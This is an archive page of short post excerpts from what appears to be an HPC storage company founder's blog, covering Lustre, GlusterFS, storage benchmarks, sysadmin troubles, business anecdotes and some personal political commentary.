I’ve heard OCZ being looked at by Seagate and others. That would make sense. Honestly I think my expectations are not that companies have fire sales going on … but that areas where some sort of force multiplication is possible … these companies will be snapped up to help grow larger companies. Acquirers are after a few things. Value in terms of market, products, people, technology and capability, fit, etc. I do expect to see a few fire sales, but not many.
Posts
A question a customer asked relative to Lustre and the Whamcloud acquisition
Whats to become of Chroma (from Whamcloud)? I know its early, and I am sure that there won’t be answers just yet. Intel acquired Cilk, and its now available (and being integrated into gcc!) Intel acquired many others, and their bits are available. I’d expect Chroma to be made into an offering from Intel, along the lines of their cluster suite. Fully integrated stack. I know some folks are nervous about the acquisition.
Posts
Some kernels don't like having non-assemble-able software RAIDs
This one took me a while to figure out. I had to start probing why a system would crash the MD stack shortly after booting, but not in single user mode. So I started delving into the RAID. And found that the folks who set this unit up had a RAID0 with 0.90 metadata on the devices, and then 1.2 metadata on the MDS. So along comes the Lustre-ized kernel, and whammo.
Posts
ahh grub 0.97 + ext4 ... how I loathe thee
I had forgotten that some combinations of grub + file system could be rendered unbootable without lots of additional help. Grub is annoying. This is Grub legacy. Grub current tries to fix the mess, but fails as it is overly complex. And it appears to omit PXE and network boot options. Well iPXE helps us there. This is why we like tiburon so much. No installation. No problem. No grub to worry about.
Posts
bad design + bad implementation = company success ??? Seriously ???
We are often hired to work on existing systems, to see if we can help make them faster and better. I am working on such a project now, but this post is not about this project. I’ve noticed a tendency in the market to shoehorn a set of designs for storage/computing systems into areas they weren’t designed for. Moreover, these designs would be right at home 15 years ago, since then, far better scale out designs have come along which do a far better job than the older designs.
Posts
hits bottom, digs deeper
[update] below the fold and video. I can only conclude at this point that the “don’t get it” disease runs deep and wide in this administration. [update 2] This at the WSJ encapsulates what we are observing. This has gone beyond painful to watch to embarrassing. The president now claims that his statements were sliced and diced. He now is saying that he believes that businesses built themselves, while claiming that his earlier statement was taken out of context.
Posts
Putting 2 and 2 together, hopefully getting 4
I’ve been long bothered by serious people espousing ideas not well correlated with reality, as representing reality, and telling us not to believe our lying eyes or instruments. This is in a context of (catastrophic) AGW (call this CAGW). I don’t have any dogs in that race, nor in fracking, which uses hydrological mechanisms to extract hydrocarbon fuel precursors from underground reservoirs. I am very interested in sound science, and sound policy derived from either sound science, or as close to intelligently constructed policy as we can make.
Posts
Insanely funny comedic response to "you didn't build that"
This past week saw the president of the US in another major screw up … one he doesn’t quite understand why its a screw up … and many of his supporters don’t quite seem to get it either. The responses to the screw up have been coming fast and furious. This has become a major issue of the campaign now, about “getting it”. Its as defining as “its the economy stupid”, and specifically as to what the economy is.
Posts
Economic headwinds being reported
HPC is a small fraction of the total computing market. The market in general experience forces from the state of the economy … in growing economic times, generally large portions of the computing market are refreshing and updating gear. Conversely, when we are treading water, or contracting as an economy, word from on high in IT organizations is usually “make do with what you have” for a while. Many industries and economists have noted signs portending a downturn over the past few months.
Posts
SSaaS ... huh... what?
On James Cuff’s blog, a nice post about utilization of software. In it he writes:
to which I say …
Human Voice Clip Female Young Woman Exclamations Oh Man
Seriously … I gave up on the indentation as a form of program structure when I stopped doing much Fortran. Sheesh. Whats next … everyone using BASIC, with a little OO wrapper, a JIT, and an LLVM backend to run on GPUs (with a VHDL conversion tool)?
Posts
Seriously enjoying playing with the Julia language
See here. Parallel and distributed computing, not as an afterthought, but reasonably well integrated. Even better would be loops and vector ops which handled parallelism completely transparently … which … they effectively do in some cases. Waiting on static compilers, this language uses LLVM backend. There’s even a hook to generate code for PTX targets. No more separate language needed for GPU. Just run your code and it takes advantage of computational resources, regardless of the asymmetric nature.
Posts
Gaak ... this is why we like tiburon
Finishing up building an testing system for Ceph for a customer. Unfortunately, due to another technical issue, we couldn’t simply encode the config in tiburon finishing scripts. The technical issue is the use of the current tiburon master system by another project, and we don’t have another spare system to build a mirror of it (going to change this soon), we are stuck using an older more rudimentary version of the system.
Posts
GlusterFS and RDMA support
[update] In 3.3.1/3.3.2 This appeared in the 3.3.0 docs. “NOTE: with 3.3.0 release, transport type ‘rdma’ and ‘tcp,rdma’ are not fully supported.” On page 133 of the Admin Guide. We’ve been noting breakage with support since the 3.0.x days. I think there were varying factions within the company that wanted pure tcp, and some wanted RDMA included. The latter is what HPC folks use for their storage. GlusterFS is going in a decidedly non-HPC direction, which is fine.
Posts
9 years and 351 days
[updated to get the count right] Thats how long the day job has been in business. Our 10 year anniversary is 1-August. I started this business 10 years ago, in part to scratch an itch, but really because I believed strongly in the HPC market. I still do, though our view of the market has evolved, and we look on how its been evolving with mixtures of joy and trepidation. Trepidation in part because we’ve been pretty good at predicting what comes next, and sadly not been able to raise the capital needed to build in that area (at least previously).
Posts
Why business models for HPC are so very important
You need a sound business model. Not a sound business plan, but a concept of where revenue comes in, and how you will profit from it, and what your costs are, before you should build and sell a product. In the case of state sponsored infrastructure, any model that looks like this:
1. Build it 2. ??? 3. Profit! is a failure waiting to happen. Its not a business model.
Posts
huge dependency radii, or why I stopped using Catalyst
More than a year ago, we were working on (re)developing some code for UI for our units. Original UI code had been in Catalyst framework, an MVC system for Perl. I like Perl, it makes rapid application development easy, and reasonably painless. CPAN makes avoiding coding things yourself pretty easy. Short side trip. A dependency radius is the measure of the number of additional things unrelated to your source code itself, required to build or operate your program.
Posts
... and Whamcloud is snarfed up by Intel ...
See here
First off, congratulations to Brent, Eric, and everyone at Whamcloud. I had thought that the BI/Big Data side of things could prove interesting for them, and might make them in play. I hadn’t realized how quickly this was the case. Second, Big Data is huge. Lustre, which is effectively Whamcloud’s product (ignoring IP ownership, yadda yadda …), can play there, though it needs some serious additional work. But with the acquisition, I’d argue that the multithreading MDS and ODS are not far off.
Posts
OT: Just brilliant
Been a thunderbird email client since 2004. Dropped Evolution in favor of thunderbird, it just worked, everywhere, the same. Around 2009-2010 time period, Mozilla decided to refocus thunderbird. Pull resources from it. This didn’t work out well, as users protested rather intensely. Looks like they are about to do it again, specifically to start chasing the mobile market. This letter on pastebin … and the priceless commentary afterwords, yeah … says it all.
Posts
Just configured a new generation storage unit ...
4U, 256TB raw, fire breathing monsterously fast unit. Our existing 5U units already leave competitors single units, never mind their storage clusters, deep in the dust, and falling rapidly behind. Next gen isn’t incremental change. Its big. Huge even. Density and performance that boggles my mind, and we’ve set some pretty serious records for performance (5.6 GB/s read, 4.5 GB/s write for spinning disk) with the existing kit. And you will see these very soon.
Posts
Presenting the Higgs boson
Reuters has an article on it here. Not my area of work from a while ago, but I had a few friends (postdocs, etc.) working on it (in a theoretical sense). One quit high energy physics to work on the “muck left over after the big bang”. The latter is where the money and jobs are, the former is for those who get lucky and find an academic home. I find it funny how reporters tend to paint groups with broad strokes.
Posts
What to think about cloud outages
EC2 wwas taken down by the storms running across the US. Parts of EC2 were anyway. And it took down Netflix and others. Hmmmm. We put our web and mail into EC2 specifically to avoid these sorts of problems. While we are working on getting our second line up on a different technology from our primary, we are leaving it in the cloud. As I’ve said many times …. There ain’t no such thing as a silver bullet or a free lunch.
Posts
OT: my reading list ...
So I am off on a vacation tomorrow. Normally for our summer forays, I grab Gardner Dozius compendium called The Years Best Science Fiction. I have from year 14 to the current (year 28). Its just not summer without it. Well, its not out yet. Will be out on 3-July. Oh well… Ok … I also grab everything by Charles Stross that I have not read from the preceding year. Hey, he’s got a new Laundry book coming out!
Posts
OT: Off to a nice "relaxing" vacation tomorrow
Long overdue. We’ve had a … challenging … year, starting some family health issues, and my working from home for the first 6 weeks of the year. Company had to make an adjustment after we realized that there was an poor matching of capabilities, motivation, and goals for a portion of our team. All this contributed to increasing my level of stress. So I am happy to report that we are hopping into a car (minivan really), and making the trek to Orlando, by way of Atlanta.
Posts
[updated] Lumps ...
[Update] Not all of the issues were with the supplier. I started investigating and found out that we deserved some of the lumps. Me in particular for not paying more attention to the situation as it evolved. I made the assumption that someone else was covering it, and I didn’t need to. As I’ve discovered, this was a mistake on my part. The story is more annoying than I allude to here.
Posts
(nearly) a Gigaflop at your side
First impression: this is so wrong … so … very wrong … Second impression: well, mebbe not.
[ ](http://hothardware.com/Reviews/Samsung-Galaxy-S-III-Review/?page=5)
Seriously though, this is a natural evolution of a public “flash” cloud. This is 1/5 of a gigaflop, which as a grad student 22+ years ago, I would have sacrificed for. I don’t think it will be too long before we are seeing multi-GFLOP on our hips. In which case, apart from network latency and storage bandwidth and size … you’ve got a seething mobile computing platform out there with a huge aggregate capability.
Posts
Security and legal implications of the data bandwidth wall
Again, hat tip to Alastair who pointed me at this article. At the most basic level, there are real costs, and real consequences to not being able to act nimbly, and leverage the bandwidth you need to perform the operations you require to successfully perform your job functions. These consequences could have some significant implications for legal cases. Or for terror threats. What if you have a trove of data, that you have to act quickly upon?
Posts
Security and legal implications of the data bandwidth wall, part 0
Had a link sent in (hat tip to Alastair) with a story that perfectly illustrates the data bandwidth wall, our ability to act in a legal manner with respect to it. There are broader implications, and … to us … something of a surprising connection to the company. And a serious indictment of the current US government procurement process. This story has EPIC FAILURE (for the US government) written all over it, for multiple reasons.
Posts
Bad decisions in retrospect
We’ve made one in particular, that is causing me to (seriously) regret our choice. We use wiki software for our documentation and internal site(s). We had chosen dekiwiki as our platform, based upon our perceived need for ease of use, access control, and other issues. First Wiki went up fine. This was an internal wiki for knowledge capture. Second wiki came up fine, for documentation. I like living documentation we can annotate.
Posts
Is flash a flash in the pan?
This article makes a case that it is. As with many articles about X dying, its worth asking if their argument makes sense. Basically the point they are making boils down to density, resiliency, and other aspects. Specifically they point out that the fundamental flash design is inherently flawed … it self destructs after a while … wears out. So their argument begins, the denser the bits per cell, the fewer write cycles before the cell is unusable.
Posts
OT: Wishing for more competition in cellular phones ...
Just spent 3+ hours dealing with Verizon over setting up a business account for the company, moving phones/mifi to this, and getting a new line. Discovering in the process that the company doesn’t quite grok business customers. Or its own products. Or what its sold. Sadly, Verizon’s network is the best. Sadly, they are … a royal pain … to deal with. Very long story, wish it weren’t as bad as it is here.
Posts
code angry: Application gateway via very powerful Perl code
I’ve been banging my head against fastcgi. At a fundamental level, fastcgi is meant to be a CGI gateway allowing multiple simultaneous processes to run at once, to serve pages. Ok. nginx (and Apache, and others) can use fastcgi to run PHP code. Well, Apache can run it “natively” while the others need to run it externally. Our website is PHP based (drupal). So are some of our tools. And ya know, the transition to nginx has not been smooth for them.
Posts
A lesson in economics
This is somewhat tangential (at least the initial part) to HPC and storage, but it has significant similarities … its worth paying attention to. Much text, noise, and argumentation have surrounded things like Obamacare here in the US. This is, whether or not the proponents like to admit it or not, a push for a socialized medical system, with “controlled” costs, and all manner of other things. Yeah, we’ll hear how the US has “crappy” medical coverage, or country X is so much better because everyone gets coverage.
Posts
Nginx rules ...
I was having lots … and I mean LOTS of trouble with apache 2.2 on the new web server. It simply refused to do vhosts no matter what I did. Debugging it was painful. I’d tried lighttpd in the past, and while I liked some aspects of it better than Apache, it still was hard to debug. So I figured I’d give nginx a try. Its an up and comer in the web serving business, and seems to be one of fastest growing on the net.
Posts
... and the VM (and its snapshot) managed to get corrupted ...
Talking about rt. Our support site. Thankfully most of the stuff is in the database with a little customization. Thankfully we want to move from 3.x to 4.x. Annoyingly, this is more work. Thankfully, our web server design is now far more intelligent than in the past. We may simply run it on the web frontend directly, rather than running it as a VM. There’s really little advantage to the VM, and we keep having to do a reset of the VM.
Posts
Why ... oh ... why ...
Dear Red Hat: You put out a good product in RHEL 6.x. Ignoring the (often massive) performance regressions, other things are better/more stable. Dracut, is growing on me. Actually liking being able to debug startup. But, this said … I have to inquire … Why on earth did you include an End-Of-Lifed version of Perl (5.10.x) in RHEL 6.x? What … exactly … was the thought process behind this? Have a look here: and search for “Latest releases in each branch”.
Posts
Snort ... guffaw .... cackle ...
Enjoyed this read. Some of the take away snippets
Ok, there is a combination of humor, and a possible simple test to determine if you are one of them thar bad “right-wingers” (note: tongue firmly planted in cheek here). Just ask a) education level, and b) opinion of AGW. But even more than this … this study was drive by the soft science folks wondering about some attitudes and levels of scientific literacy and numeracy.
Posts
RIP Kyril Faenov
Kyril Faenov of Microsoft passed away several days ago. He was one of the visionaries and leaders behind Microsoft’s HPC effort. He was also a nice guy, one whom I had a chance to talk with several times over the last few years. One of the bright folks you like to challenge. I respected him and his efforts, even if I didn’t agree with them. More information here, and I found this originally at InsideHPC.
Posts
Stress analysis of a market ... does this explain Facebook's IPO issues?
c.f. this post at ZeroHedge.
In case you haven’t guessed it, ZeroHedge does not like HFT aka algorithmic trading. Its an informative blog … sometimes bordering on alarmist … but for the most part, a good read.
Posts
Misalignment of performance expectations and reality
We are working on a project for a consulting customer. They’ve hired us to help them figure out where their performance is being “lost”. Obviously, without naming names or revealing information, I note something interesting about this, that I’ve alluded to many times before. There is an often profound mismatch between expectations for a system and what it actually achieves. This is in large part, why we benchmark and test our systems in as real configurations as possible, and report real numbers, while many (most) of our competitors make WAGs at best case/best effort/best condition theoretical numbers.
Posts
siFlash tuning
We’ve been tuning our siFlash. Not done yet … not done, but look where we are. 24 simultaneous streaming (non-cached) reads.
Run status group 0 (all jobs): READ: io=193632MB, aggrb=7781.4MB/s, minb=7781.4MB/s, maxb=7781.4MB/s, mint=24884msec, maxt=24884msec Yeah. Baby. Added another almost GB/s to the read performance. Streaming write performance is hovering around 2.6GB/s. Remember, this is a half configured system. Imagine what we could do with a fully configured system. Sustaining 147k random write IOPs (4k random writes, with 144 simultaneous threads), and 210k random read IOPs.
Posts
What high performance isn't
We’ve had a number of interesting interactions with customers over the last few weeks. They all seem to center on, and around, how to get high performance out of gear which isn’t designed for high performance. Generally speaking, you can’t. High performance requires a mixture of design and implementation, with well designed and implemented parts. High performance isn’t
A random collection of web and file servers joined together with clustering tools Some random tier 1 box usually used as a lower end file server shoved with disks/ssd/Flash A poorly architected, but easy to purchase system (e.
Posts
Thinking of using Warewulf as a base for some of our diskless work
I’ve been thinking about this for a while. We have a good diskless system, but I’ve always liked the nano-ramdisk version of the OS. Create a base distro with JEOS (just enough OS) to boot, and mount all the other bits you need. Not that there is anything wrong with what we are doing now, its just that I really like that capability. Especially if we could keep the ramdisk compressed.
Posts
An NFS gotcha
As we rebuild our server infrastructure (aside from taking time to do things more intelligently), we run into some bumps. This one sorta threw me for a bit.
[root@virtual ~]# mount -a mount.nfs: Stale NFS file handle mount.nfs: Stale NFS file handle Checked all the usual suspects. No dice. The /etc/exports was correct, and visible locally. There was a DNS oddity I resolved (humor … heh). But mounts kept giving me the stale NFS handle.
Posts
When core assumptions that should never be wrong, do turn out to be wrong
So … where does this tale begin? We had a nice backup system in place at the lab. Twice a week, all the important servers would happily sync their contents to this unit over Gigabit ethernet. It worked well, we were happy. Place that snippet in the background, it will come up again. I’ve told our customers for a long time that RAID is not a backup. RAID is RAID, it gives you time to recover from a failure.
Posts
... and it can talk ...
[root@<a href="http://scalableinformatics.com">skunkworks-prototype-n2</a> ~]# ifinfo device: address/netmask MTU Tx (MB) Rx (MB) eth0: addr not set/mask not set 1500 0.000 0.000 eth1: addr not set/mask not set 1500 0.000 0.000 eth10: addr not set/mask not set 1500 0.000 0.000 eth11: addr not set/mask not set 1500 0.000 0.000 eth12: addr not set/mask not set 1500 0.000 0.000 eth13: addr not set/mask not set 1500 0.000 0.000 eth14: addr not set/mask not set 1500 0.
Posts
Its ... alive ....
Our little skunkworks project boots!!! Mwahahahaha! Must check off on our list
design build boot ??? profit (or something)! Note to self: work on eeeeevul laughter …. And get step 4 ironed out too.
Posts
After 4 years, our deskside JackRabbit unit decided to shrug off its mortal coil
икона за подарък… and in the process, take down a drive, 5 of its friends, and our RAID card. We have backups from before the move (15+ days old … sigh). We’ve decided to go full monty on the new unit. Its a JackRabbit JR4 with 12x 2TB drives, 2 hot spares, and 10 disk RAID6 (8x data drives). 2x OS drives (on SSDs, rear mount). Leaves us 12 open bays.
Posts
Updating a design to modern concepts ...
So in order to (really) bring my monitoring app into the modern age, I want to change its flow from a synchronous on-demand event driven analysis and reporting tool, to an asynchronous monitoring and analysis tool, with an on-demand “report” function which is basically a presentation core atop the data set. There are many reasons for this. Not the least of which is that this should be far more efficient at handling what I want to do … not to mention more responsive.
Posts
Every now and then, the truth leaks out
Good article from Matt Asay in The Register today.
This is about as truthful as it gets. There are many tiny startups, pulling in various fractions of $1M to more than $10M to develop … product features. Is this really the right approach for VCs? And this opens up some interesting new questions on startups and their product offerings themselves. Take Netflix. Running on Amazon S3. And what does Amazon do?
Posts
On my fun end of a week ...
(this was actually a while ago, just getting to publishing it now). Friday, I drove up to a local University to drop off our bid. I sent a note beforehand to let them know I might be a few minutes late, there was construction. Sure enough, got caught in a 30 minute slowdown. I was 13 minutes late. They said, “hey thats great. We won’t look at it” Then on the way back, the old landlord refused to acknowledge that we were tenants, so they refused to refund our deposit.
Posts
Parsing apache logs ...
Seems I’m not alone in the world wanting to parse apache log files. I googled lots of people bitterly complaining about it. Some folks wanted to write a grammar, and a flex/yacc/bison thingy. I am sure that there are some Java programmers who’ve been working on this … oh … 6 or 7 years or so, and may be approaching a solution, with a Java byte code only slightly below 1 PB in size.
Posts
Good programming tools and good program implementation
Way back in my early days at web programming stuff, I started out with HTML::Mason as a templating engine. There is nothing wrong with Mason, its actually quite good. But it encourages the same sort of “code-in-page” designs that the entire language of PHP was built around. I’m mostly a Perl guy for application level stuff these days … have done my time with Fortran, Python, x86 assembly, C/C++, and many others.
Posts
Company's email and web are now on EC2
Turns out Comcast doesn’t follow through (even when you call them many times to try to get them to). Thanks #Comcast . On Thursday, I bought a Mifi (pay as you go) from Verizon. Got it into the office. Had moved the web/mail stuff to Amazon EC2 “just in case” Comcast pulled a … well … Comcast. Yeah, took me a little while to fix the email and web side. We’ve been using our router appliance as our SOA for dns, and I had to unplug it at the old site (got everything out before 5pm Friday).
Posts
What high performance storage isn't ...
This happens often. We get a call from a user whose seen my postings in the Gluster or other lists. They’ve set up a storage system, and the performance is terrible. Is there anything that can be done about this? We dig into this, and find out that the people bought hardware, usually fairly low end/cheap brand name (e.g. tier 1) nodes, with limited disk options, and are running 1 disk for OS, and have another single larger SATA or SAS disk for storage.
Posts
... and old faces leaving and new joining
One of our guys has left the organization. This is always hard. He is a good person, I like him a great deal. But I understand that sometimes there isn’t as good a fit as we might like there to be. If you happen to know a great HPC organization that needs an awesome senior sales dude, please email at the day job (landman At ScalableInformatics.com), and I’ll pass the contact along to him.
Posts
New office ...
… movers pick up the old office bits tomorrow, and bring it to the new office. Have some (re)construction to do, some racks to stand up, an AC unit to hook up … and then the important things (which I learnt from my friends and customers in the UK) … a refrigerator and good cappuccino machine to buy …
Posts
Something ... awesome ... this way comes
Ever had an OMFG moment? Ever wish you could share it? In time, in time.
Posts
Q: So why did this go "bang" ?
A: I updated the OS. Bad … bad Joe. Very bad. Don’t do that. Baaaaaaad Joe. … and now I get to fix the email, and the file server portion … and … Thank gosh for my … er … paranoid backing up of useful things. Pack-rat-ism is not a disease … its a quality … a feature.
Posts
Python ... grrrr
Hacking up some python classes and object bits for a project. Honestly, this would be soooooo much easier in Perl, but for a number of reasons, the person started it in Python. So we are trying to contribute. And I am running into some of the more joyous elements of python. Such as completely inane error messages which tell you next to zero about what the real problem is. Thankfully, I have google.
Posts
Ahhh ... IPsec ... How I loath thee ...
Ok, maybe not the spec so much. Maybe just the client codes. Working on setting up an IPsec tunnel. The only IPsec implementation that I’ve tried on the client side that actually seems to work (e.g. get to a point where I can debug it) is Apple’s. Haven’t tried the Cisco yet, we don’t have a support contract with them, so we can’t download it and test it. Since we are setting this up for a customer who does, either we’ll VPN into their site and set it up, or work something out.
Posts
OT: as the political season rolls on ...
I’ve mentioned it before here, that this is a presidential election year in the US, and I expect it to be a nasty one, at best. We in the states largely fall into one of two major parties, with some of us proclaiming independence or preference for other parties in the noise. The media in this country is biased pretty hard in one direction with one solitary exception. Every now and then they admit it (as the NY Times did a few days ago).
Posts
Epic failure: Apple security mismatches
Was trying to install an app on Saturday. Up popped a request for more information, including a second attempt at getting my password, and then 3 “security” questions, including “What city was I first kissed in.” Um. Ok. That is an EPIC FAIL in and of itself, but lets go on to the real … BIG EPIC FAIL. The security questions presented on the Apple app do not match those, or even come close to matching those on the appleid.
Posts
The TB sprint updated ...
Previous results here. 12.4TB/hour. A new JackRabbit unit with some updates. New results: 1TB written in 228.2 seconds. 15.8TB/hour writes
Run status group 0 (all jobs): WRITE: io=1024.6GB, aggrb=4597.1MB/s, minb=4597.1MB/s, maxb=4597.1MB/s, mint=228167msec, maxt=228167msec and for the reads …
Run status group 0 (all jobs): READ: io=1024.6GB, aggrb=5341.9MB/s, minb=5341.9MB/s, maxb=5341.9MB/s, mint=196392msec, maxt=196392msec This is 18.3TB/hour reads. Writing 1PB on this machine would take almost 65 hours. So if we could break the writes across 65 machines (9 racks), we could write 1PB in 1 hour.
Posts
Oh joy ...
Pretty good probability I’ll be needing to go to London this weekend to fix a problem caused by a somewhat overzealous local support org. See the motherboard post from a few days ago. Turns out they damaged the replacement they put in. I like London. I don’t like having to do this though.
Posts
Update on our lawyergram
A few months ago, the bank which had foreclosed on our now former landlord executed what could be called a legal pressure manuever. They wanted us to buy the space we are renting. They threatened to sue us for back rent. Our lawyer skillfully deflected this, pointing out their several failures in the process. They finally admitted they were seeking to pressure us to buy it. Go figure. So we are about to move to a larger spot.
Posts
The danger in modifying precision built and tuned machines ...
… is that they won’t be precision tuned after you are done with them. And worse, much of this is self-inflicted in various cases. We try to ship absolutely peak performance machines. Tuned as much as possible, though in some cases, customers make requests that go against high performance. We try to explain the issues, but customers are always right, even when they aren’t. In a number of cases, customers wipe what we’ve done.
Posts
"Hey, here's a nice machine, let's replace its motherboard"
Something like this just happened to one of our customers. I am aghast that this was done the way it was, but it was. One of these things where you don’t find out that there was a service issue until its “done”. For various definitions of “done”. I anticipate being on a phone call to Europe in a few hours to discuss my definition of “done” with the people who did this, and ask them if their definition of “done” includes the concept of operating correctly.
Posts
Mebbe there is a reason that I am in "fly over" country ...
So here I am, toiling in the salt mines (just don’t tell my wife its not really that bad), trying to eek out a living selling, servicing, and supporting some insanely fast storage kit to a range of customers, when I hear that Instagram had sold for $1B. My first thought. What the 4K (phonetic, just don’t say it out loud) is Instagram? And what did it do that made it worth $1B?
Posts
Way way back ...
… when I was at SGI … oh … 16 years ago or so, someone, for some reason sent me an email where they made some specious claims. I calmly pointed out to them where I caught their error, what the error was, and how they could fix it. They then proceeded to attack me in email, and started bugging me on my work phone. Later, after I had left SGI and started Scalable, someone had posted some rather poorly thought out discussion of something, and attacked me (again) for some rather idiotic reasoning.
Posts
Is LinkedIn just Usenet with a pretty face?
I am starting to think so. Had a little discussion with someone I thought would be professional, who made some interesting claims, and didn’t quite like it when challenged. And it devolved from there. I guess it is funny to see someone try to explain stuff to me, who doesn’t quite know my background, or experience, or … I’ve heard from others who believe that LinkedIn is as complete a waste of time as Facebook.
Posts
OT: Annoying spammers
Some idiots have taken our companies phone number, inserted it into their caller-id bits (seemingly with SIP phones), and have been harassing people. So we get frustrated people calling us, asking us if we called them. No we didn’t. I hate phone marketeers as much as everyone. This is really annoying. Can’t see any rational reason for this other than someone trying to steal the companies reputation.
Posts
sad/exciting time ahead
One of our customers has become fed up with the issues they’ve run into on Gluster. Started about a year ago, with some odd outages in the 3.0.x system, and didn’t improve with 3.2.x … in some instances it got worse. RDMA support in 3.0.x was pretty good, there were other bugs (which were annoying). The migration to 3.2.x was rocky. Libraries left from 3.0.x were somehow picked up and some things just failed.
Posts
High performance firewall ... with a nice 10GbE port
Have a customer with a hard problem. They need to handle very high data rate traffic, VPNs, and all manner of things. Imagine a GbE in (or more). They asked us to build a firewall that could handle this. Most of the appliance firewalls have some capability, but few will really survive a serious traffic onslaught. Most use very low power processors, on purpose, because most of the time the traffic isn’t intense.
Posts
SRP joy
ok, not really. Late last night, while benchmarking some alternative mechanisms to connect {MD,OS}S to their respective {MD,OS}T for a Lustre design we are proposing for an RFP, I decided to revisit SRP. I liked SRP in the past, it was a simple protocol, SCSI over RDMA. How could you go wrong with this? Well, I found out last night. I put our stack on a DeltaV connected with a 10GbE and QDR IB ports to our respective switches.
Posts
Taking siFlash-SSD out for a spin, and cracking the throttle ...
… half open. [update] video [FLOWPLAYER=http://scalability.org/wp-content/videos/screencast_video.flv,480,315] I won’t show the fio output until I get the unit back and get some more testing in. Also, I’ve discovered something … I guess … depressing about fio, in that what it reports for performance isn’t necessarily what the storage subsystem sees. This isn’t just fio, its pretty much all tools that talk to the file/storage API at a high level. The low level actual results (you have to grab data from the OS reporting infrastructure to see this) differ, sometimes wildly, from the high level API results.
Posts
HPC Linux on Wall Street was fun
Spoke to lots of interesting people. Ran some benchmarks. Will talk about those next post. Found hits on the corporate site from a Yahoo stock board. Ok, that was interesting. Had a number of great conversations … before, during, and after the show. I am still in NY, working on a siCluster at a data center.
Posts
Looking forward to the HPC Linux on Wall Street conference
Will be there with a new siFlash unit. Uses some new Flash and SSD devices. Should be able to talk about that soon. Whats cool is this is our chassis. Not a COTS chassis from one of the larger vendors. This is a new chassis we worked on designing with the ODM. The unit is a prototype, and sadly the motherboard we will use for this isn’t quite in full production yet, so we are using a stand in.
Posts
This is huge: USSCSCOTUS throws out gene patents
If I read this correctly, this applies to all gene patents. Which opens up genes to multiple groups trying to target specific diseases. Its good for people as it increases the likelihood that no one company can “landgrab” a set of genes implicated in various diseases and do nothing with them. Its bad for companies business models attacking these diseases, especially smaller biotech/startups. The model wasn’t sound to begin with, you cannot patent nature or natural things.
Posts
Incredibly busy as usual
I have lots of drafts in queue, just not enough time to finish them. I’ll make a concerted effort this weekend. As an update to a previous post, I managed not to collapse during my brown belt test (had some respiratory issue going on … allergies, or a cold, or something). The kata were not “hard”, but they expect different things from you at higher rankings. You can’t go blasting through the kata like a robot (as I probably did with my first one).
Posts
"Irrevocable worldwide..."
ХудожникEvery now and then we get customers asking us to perform only services under contract. They send us what they think their T&C; ought to be. Yeah … I especially like the lines the relieve us of our IP, our rights to collect royalties, our rights to what we develop, … Yeah. Ok, maybe not so much. I have to admit, when I see this, my first reaction is to start laughing.
Posts
Tiburon extensions
Basically, I can boot quite a few Linux systems completely stateless. I like this. Makes setting up clusters drop-dead simple. Makes setting up/testing hardware similarly simple. Where I am going with this: I’ve been playing with Solaris 11, and to a lesser extent, the Illumian distros for Solaris. So far, I like what I see in Solaris 11, and I like the Debian-ed version of Solaris in the Illumian distro. For the former, I want to see if we can formally offer this on our gear.
Posts
Code angry: fixing a self-inflicted bug in Tiburon
I hate when I try to write generalized code up front. That is, I try to write a code base that is sufficiently generic that it works for all possible use cases. Some argue for this sort of development. I don’t like it. But I do fall into this every now and then. Tiburon suffered from some of this. I want one system to “bind them all, and in the PXE process, boot them.
Posts
Cool bug in grub in Centos 6.2 (and therefore in RHEL 6.2)
So if you are like us, you are a belt and suspenders person … you like multiple administrative modalities. You like them because you know they are needed. Because breakage usually happens at the least opportune time, and you need a way in to express your control. So we have KVM. And we have IPMI. And we have a serial over lan (replacing the old serial consoles). If you are more that 5 miles away from the gear, you will appreciate having these multiple modes.
Posts
Another step in a journey of many miles
This is OT from HPC and from Storage. Sort of. The death this past week of Andrew Breitbart, whether you liked him, hated him, or hadn’t a clue who knew of him, again highlighted for me, the need to take time off, for me, every now and then. Just a few hours per week of time to get out and exercise. To burn off frustration from high on the pony scale discussions.
Posts
Thought I was going nuts ...
Ran into this earlier in the week and thought it strange. Centos 6.2, brand new installation on a box that has had Centos 5.7 installed. Set of our newer RAID cards, 10GbE, and IB cards. This is our in-lab JackRabbit JR5 machine (happily still the fastest single spinning rust machine you can get in market). As soon as I start the PXE load … CRASH!!!! Kernel doesn’t panic, it just gets stuck.
Posts
then comes the realization ...
that to process all the requests, and service all the potential business we have, I’m gonna have to hire a Joe-clone (since cloning is illegal in Michigan for some reason). Possibly 2. Lets see if we get these contracts first, but this is a good problem to have. But back to the Joe-clone … would we be allowed to not pay a clone of me, or provide health coverage, as they were just another instance of the “Joe” object?
Posts
back from the UK, and a good reason to drink Guinness
I enjoyed my trip. Well, not the part of being away from my family, but there is much to see/experience in London. A curious difference between London and the UK in general and the US is the apparent lack of public restrooms (or WC’s if I have the right localization). Especially in a crowded space like Covent Garden. The customers in the UK (spent time with two at their sites, on the phone with ~5 across the world, and working with ~4 via email) have good problems (not as in blocking problems, but emergent problems that occur in a variety of use cases).
Posts
Check one item off my bucket list
Spent the early afternoon at Westminster Abbey. Saw the tomb/memorials of Sir Issac Newton (all of physics), James Clerk-Maxwell (electromagnetic theory), Faraday (magnetism), and PAM Dirac (quantum theory). A shame they didn’t have anything for Turing (or if I missed it, lemme know and I’ll go back). Also saw memorials and tombs for Shakespeare (he’s buried at Stratford on Avon I think), Chaucer, Jane Austen, Keats, Shelley, … Very nice place, highly recommend it.
Posts
The blame game
This isn’t what you might think from the title. Its an observation. I hope I don’t misstate what I intend to say, so feel free to chime in if you don’t agree with the wording. When you have a situation where a customer has a set of vendors, and a problem that needs resolution, the customer will gravitate towards assigning blame for the problem to the most competent of the vendors, the most proactive of the vendors, in the hope that it will be resolved, regardless of whether or not that vendor’s gear/stack is in any way involved.
Posts
Working on solving a problem for the day job
Long ago, I concluded that the day job was not a bank or credit granting institution. We aren’t equity financed at this time, have no finance arm/division with capital backing to provide large credit for customers to purchase with. And we have customers. Lots of them. Many/most asking for credit terms. But we can’t really float a loan of 1/5 of our yearly revenue for 90 days as some of these opportunities would require.
Posts
Well, I'd call this the best commercial I saw during the game
In part, because they weren’t overtly … or even subtly … selling anything.
You can see the commercials here.
Posts
Sorry about that
Was working on a post about the upcoming US elections. It wasn’t ready. I had edited it a number of times, and hadn’t gotten my complete thoughts down. Managed to hit the publish button midway though. Pulled it down. It wasn’t ready for consumption. Short version: US politics, always a messy game, is going to be ugly this year. We have hard core ideologues arrayed on the (effectively 2) sides, unwilling to compromise their positions for a “greater good” of the body politic.
Posts
